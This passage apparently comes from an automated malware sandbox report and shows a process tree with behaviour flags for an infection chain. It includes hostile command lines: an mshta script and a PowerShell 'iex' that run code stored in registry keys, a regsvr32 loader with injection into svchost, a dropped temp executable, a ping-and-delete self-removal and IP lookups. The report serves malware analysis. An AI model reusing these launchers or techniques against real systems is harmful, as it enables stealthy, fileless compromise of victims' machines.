- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1528 -
C:\Windows\System32\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /s /i dDdoiBj.ocx3⤵
- Suspicious use of WriteProcessMemory
- Process spawned unexpected child process
PID:1232 -
C:\Windows\SysWOW64\regsvr32.exe/s /i dDdoiBj.ocx4⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Loads dropped DLL
PID:1800 -
C:\Windows\SysWOW64\svchost.exeC:\Windows\System32\svchost.exe5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Checks for installed software on the system
PID:1852 -
C:\Windows\SysWOW64\cmd.execmd /K6⤵PID:572
-
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\System32\svchost.exe6⤵PID:1568
-
-
C:\Users\Admin\AppData\Local\Temp\BNEC76.tmpC:\Users\Admin\AppData\Local\Temp\BNEC76.tmp6⤵
- Executes dropped EXE
PID:1932
-
-
-
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\136B3805-56F5-BDAC-F8F7-EA41AC1BBE05\\\Efsltprf'));if(!window.flag)close()</script>"2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\136B3805-56F5-BDAC-F8F7-EA41AC1BBE05").dmrctcls))3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Drops file in System32 directory
- Suspicious behavior: MapViewOfSection
- Suspicious behavior: EnumeratesProcesses
PID:1964 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j2p1xl54\j2p1xl54.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6028.tmp" "c:\Users\Admin\AppData\Local\Temp\j2p1xl54\CSCCA94FCC2B884400FB52EE936881C42C.TMP"5⤵PID:1748
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vfs4oqtr\vfs4oqtr.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1008 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES60F3.tmp" "c:\Users\Admin\AppData\Local\Temp\vfs4oqtr\CSCCC5EE894CFCD45DB87BC5C3C59C1FC7.TMP"5⤵PID:1624
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\BNEC76.tmp"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:1760 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1520
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\494.bi1"2⤵PID:1972
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:1932
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\354.bi1"2⤵PID:1964
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:1472
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\354.bi1"2⤵PID:2032
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\494.bi1"2⤵PID:1912
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Suspicious use of FindShellTrayWindow
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
PID:1864 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1864 CREDAT:275457 /prefetch:22⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1232
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1864 CREDAT:209932 /prefetch:22⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1920
-